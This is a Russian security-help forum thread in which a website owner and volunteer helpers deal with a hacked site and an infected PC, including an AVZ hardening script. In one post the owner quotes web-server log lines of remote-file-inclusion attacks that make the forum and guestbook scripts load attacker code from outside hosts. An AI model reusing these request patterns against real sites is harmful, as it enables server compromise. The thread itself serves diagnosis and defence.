Показано с 1 по 13 из 13.

Вирусы на сайте (заявка № 14338)

  1. #1
    Junior Member Репутация
    Регистрация
    17.11.2007
    Сообщений
    7
    Вес репутации
    34

    Thumbs up Вирусы на сайте

    Уважаемые хелперы!

    Зарание прошу прощения, но обращуюсь к Вам немного не по правилам, поскольку ситуация у меня не совсем стандартная. У меня сайт лежит на американском хостинге. И недавно постигла напасть - посетители стали жаловаться, что со страниц сайта к ним в компьютер ломится какой-то троян. Открываю код страниц и вижу занятный придаток, заключённый в теги , который к моему коду никакого отношения не имеет. Кому интересно, придаток могу показать.
    Мой антивирусник сначала ничего не находил. Но потом, когда я открыл страницу сайта интернет-эксплорером, выдал сообщение о трояне. Троян, видимо, в мой компьютер всё же проник, т.к. после этого появился процесс svchost.exe который стал проситься на адрес http://x-victory.ru/... С помощью файрвола (Outpost) я пресёк эти попытки, и теперь он (троян) у меня сидит, так сказать, в заперти.
    Но это меня сейчас не столь сильно беспокоит. Появится время, я непременно проделаю все процедуры, которые записаны у Вас в правилах, и выложу логи. Буду Вам очень благодарен, если Вы в дальнейшем взглянете на них и поможете мне избавиться от этой заразы.
    Но сейчас особенно остро стоит вопрос спасения моего сайта. Ибо во-первых, не могу понять, как туда вообще проник этот червь. Во-вторых, после того, как я в ручную чищу код заражённых страниц, через день или два они снова заражаются, несмотря на то, что уже несколько раз менял пароль от ftp.
    Заражёнными оказываются преимущественно индексные файлы index.html, index.php почти во всех вложенных папках. Но вот сегодня обнаружил живность в файле login.php (элемент скрипта форума phpBBgroup). На сайте стоит форум, гостевая (и то и др на php) и набор html-страниц. Больше ничего. Не могу понять, что заражает страницы - что-то извне, или изнутри аккаунта. Платформа хостинга Unix, вебсервер Apache 1.3.
    Ftp-логов пока не добился от хостера.
    Я понимаю, что информации я предоставляю не много для того, чтобы о чём-то предметно разговаривать. Но единственное, что могу показать сейчас, это примеры заражённых страниц с вредоносным кодом - его сразу видно. Может быть, кто-нибудь может поделиться советом, откуда на сервер может проникать зараза? Я в полном недоумении по этому поводу, ибо смена пароля ничего не дала. Пришлось пока запретить посещение сайта пользователями.
    Вообще, теоретически, скрипт форума или гостевой может быть источником заражения? Я их не писал, а взял готовые скрипты, довольно известные - phpBBgroup форум и Advanced Guestbook - гостевая.
    Может быть есть какие-то дополнительные меры безопасности, которые я мог бы предпринять?
    Код-то я могу вычистить, но в этом нет никакого смысла, пока не странить угрозу повторного заражения.
    Ещё раз прошу прощение за нарушение правил. Если надо предоставить какую-либо информацию, постараюсь сделать, что в моих силах, пишите, что именно.
    Буду благодарен любому совету!

  2. Реклама
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для pig
    Регистрация
    17.09.2004
    Адрес
    Апатиты, Мурманская область, Россия
    Сообщений
    10,629
    Вес репутации
    1288
    Всё-таки выполните правила - во-первых, что-то у вас живёт, во-вторых, не исключено, что это парольный вор. Зачиститься надо.

    Кто у вас хостер? Насколько он надёжен сам по себе? Может ли предоставить статитику авторизованного FTP-доступа (интересуют IP-адреса - по ним можно определить, не ходил ли кто посторонний)?

    Advanced Guestbook - про это у меня информации нет, посмотрите сами на сайте разработчика, нет ли информации о дырах. А в phpBB дырки находили, поэтому опять же идите к разработчику и читайте, какими болезнями больна установленная у вас версия.

  4. #3
    Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    27.08.2006
    Сообщений
    2,453
    Вес репутации
    0
    Цитата Сообщение от Flexis Посмотреть сообщение
    Буду благодарен любому совету!
    Защита сайта от взлома.

    Paul

  5. #4
    Junior Member Репутация
    Регистрация
    17.11.2007
    Сообщений
    7
    Вес репутации
    34
    Цитата Сообщение от pig Посмотреть сообщение
    Всё-таки выполните правила - во-первых, что-то у вас живёт, во-вторых, не исключено, что это парольный вор. Зачиститься надо.
    Спасибо, что не прошли мимо!
    Вы, конечно, правы, зачиститься надо. Приступил к выполнению правил. Поставил КИС-7, обновил базы, сделал проверку. Каспер нашёл пару троянов, которых старый антивирусник не видел:
    Trojan-Proxy.Win32.Ranky.hb - этот, думаю, у меня давно жил
    Trojan-Downloader.HTML.IFrame.af - а этим, скорее всего, заразился от своего же сайта.
    Подозрительной активности на домашнем компе теперь вроде бы не замечаю. Однако смущает то, что я примеры заражённых индексных файлов у себя сохранил в отдельной папке. В некоторых из них каспер находит вирусы, а в некоторых - нет. Раз он не видит их в файлах, в которых они на 100% есть, то значит мог пропустить и в комп. А я разок по собственной оплошности залез на сайт Оперой со включённым выполнением ява-скриптов.

    Запустил, значит AVZ. Дважды пытался выполнить "Скрипт лечения/карантина и сбора информации для раздела "Помогите!" virusinfo.info", как написано в правилах, но оба раза программа выдала ошибку следующего содержания (см. вложения).
    Поэтому файла virusinfo_syscure.zip нету.
    Сбор информации AVZ выполнил. Лог Hijack'a тоже прилагается.
    Это как нибудь может помочь узнать, что с моим компом? Если не трудно, взгляните, пожалуйста.

    Цитата Сообщение от pig Посмотреть сообщение
    Кто у вас хостер? Насколько он надёжен сам по себе? Может ли предоставить статитику авторизованного FTP-доступа (интересуют IP-адреса - по ним можно определить, не ходил ли кто посторонний)?
    Я бы сам с большим интересом посмотрел на статистику авторизоанного ftp-доступа. К сожалению, уже больше недели не могу добиться от хостера внятного ответа по этому вопросу. Суппорт у них тугой до невозможности. Хостер 3ix.com - это видимо дочерний бренд какого-то другого хостера. Не знаю, насколько он надёжен.

    Зато нашёл много интересного в http-логах. Вы были правы, активно ломились через скрипт гостевой и форума. Пока ещё не знаю, через что именно залезли, но попыток инклюда было масса!
    Вот наиболее яркие примеры:
    85.18.136.105 - - [20/Nov/2007:17:36:03 -0500] "GET /guestbook/admin.php//admin.php?include_path=http://human-design.ru/adm/faqsupport/config/exp667.txt? HTTP/1.1" 200 3289 "-" "Mozilla/3.0 (compatible; Indy Library)"
    83.13.112.58 - - [20/Nov/2007:21:56:01 -0500] "GET /forum//index.php?file=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 200 49942 "-" "libwww-perl/5.65"
    208.100.62.90 - - [20/Nov/2007:16:43:45 -0500] "GET /forum//index.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 401 - "-" "libwww-perl/5.805"
    Если ответ сервера 200 - значит сторонний скрипт был выполнен на сервере? Или не обязательно?
    Изображения Изображения
    • Тип файла: jpg error.jpg (86.1 Кб, 4 просмотров)
    Вложения Вложения

  6. #5
    Junior Member Репутация
    Регистрация
    17.11.2007
    Сообщений
    7
    Вес репутации
    34
    Цитата Сообщение от p2u Посмотреть сообщение
    Спасибо, буду изучать!

  7. #6

  8. #7
    Junior Member Репутация
    Регистрация
    17.11.2007
    Сообщений
    7
    Вес репутации
    34
    virusinfo_syscure.zip ?
    С третьего раза выполнился:
    Вложения Вложения

  9. #8
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для zerocorporated
    Регистрация
    23.09.2007
    Сообщений
    967
    Вес репутации
    836
    Что из этого нужно?
    Код:
    >> Службы: разрешена потенциально опасная служба RemoteRegistry (Удаленный реестр)
    >> Службы: разрешена потенциально опасная служба TermService (Службы терминалов)
    >> Службы: разрешена потенциально опасная служба SSDPSRV (Служба обнаружения SSDP)
    >> Службы: разрешена потенциально опасная служба Schedule (Планировщик заданий)
    >> Службы: разрешена потенциально опасная служба mnmsrvc (NetMeeting Remote Desktop Sharing)
    >> Службы: разрешена потенциально опасная служба RDSessMgr (Диспетчер сеанса справки для удаленного рабочего стола)
    > Службы: обратите внимание - набор применяемых на ПК служб зависит от области применения ПК (домашний, ПК в ЛВС компании ...)!
    >> Безопасность: разрешен автозапуск программ с CDROM
    >> Безопасность: разрешен административный доступ к локальным дискам (C$, D$ ...)
    >> Безопасность: к ПК разрешен доступ анонимного пользователя
    >> Безопасность: Разрешена отправка приглашений удаленному помошнику
    Остальное отключим.

    Ничего вредоносного в логах не видно

  10. #9
    Junior Member Репутация
    Регистрация
    17.11.2007
    Сообщений
    7
    Вес репутации
    34
    Что из этого нужно?
    Да в принципе, я думаю, ничего. Давайте отключать.

    Ничего вредоносного в логах не видно
    Спасибо, а то я уже лишний раз боюсь по ftp-заходить на сайт, чтобы никто не стащил пароли.

  11. #10
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для rubin
    Регистрация
    15.10.2007
    Адрес
    Казань
    Сообщений
    2,934
    Вес репутации
    538
    Код:
    begin
    SetServiceStart('RemoteRegistry', 4);
    SetServiceStart('TermService', 4);
    SetServiceStart('SSDPSRV', 4);
    SetServiceStart('Schedule', 4);
    SetServiceStart('mnmsrvc', 4);
    SetServiceStart('RDSessMgr', 4);
    RegKeyIntParamWrite('HKEY_LOCAL_MACHINE', 'System\CurrentControlSet\Services\CDROM','AutoRun', 0);
    RegKeyIntParamWrite('HKEY_LOCAL_MACHINE', 'System\CurrentControlSet\Services\LanmanServer\Parameters','AutoShareWks', 0);
    RegKeyIntParamWrite('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\LSA','RestrictAnonymous', 2);
    RegKeyIntParamWrite('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server','fAllowToGetHelp', 0);
    RebootWindows(true);
    end.

  12. #11
    Junior Member Репутация
    Регистрация
    17.11.2007
    Сообщений
    7
    Вес репутации
    34
    Спасибо!

  13. #12
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для pig
    Регистрация
    17.09.2004
    Адрес
    Апатиты, Мурманская область, Россия
    Сообщений
    10,629
    Вес репутации
    1288
    Цитата Сообщение от Flexis Посмотреть сообщение
    лишний раз боюсь по ftp-заходить на сайт, чтобы никто не стащил пароли.
    Раз утечка не у вас, надо разбираться с хостером. Может быть, поменять на более надёжного.

  14. #13
    Junior Member Репутация
    Регистрация
    17.11.2007
    Сообщений
    7
    Вес репутации
    34
    Ну, это сейчас утечка не у меня. Кто знает, что было до того, как я каспером проверился.
    Конечно, уже перевёз сайт на новый хостинг. Пока, правда, только статику html. Форум и гостевую не ставил. Нашёл в интернете информацию, что дыры в гостевой есть на 100%, а в форуме возможно есть.

    Ладно, большое спасибо за участие! В следущий раз буду бдительнее.

    Успехов!

  • Уважаемый(ая) Flexis, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:


    Надеемся больше никогда не увидеть ваш компьютер зараженным!

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
  • Присоединяйтесь к нам в соцсетях!

    Мы делаем все возможное, чтобы помогать людям в защите и лечении компьютеров.

    Похожие темы

    1. Ответов: 1
      Последнее сообщение: 30.08.2011, 14:47
    2. Вирусы на сайте
      От vovanet3 в разделе Помогите!
      Ответов: 10
      Последнее сообщение: 12.05.2011, 00:31
    3. xss на сайте
      От Гость форума в разделе Технические и иные вопросы
      Ответов: 1
      Последнее сообщение: 03.04.2008, 15:03
    4. Вирус на сайте!
      От Maverick_kirov в разделе Лечение и защита сайтов от вирусов
      Ответов: 1
      Последнее сообщение: 03.04.2008, 14:56
    5. Сообщи о сайте распрастраняющем вирусы, трояны итд Report Malware Sites
      От A00007 в разделе Спам и мошенничество в сети
      Ответов: 5
      Последнее сообщение: 10.03.2008, 20:36

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01622 seconds with 24 queries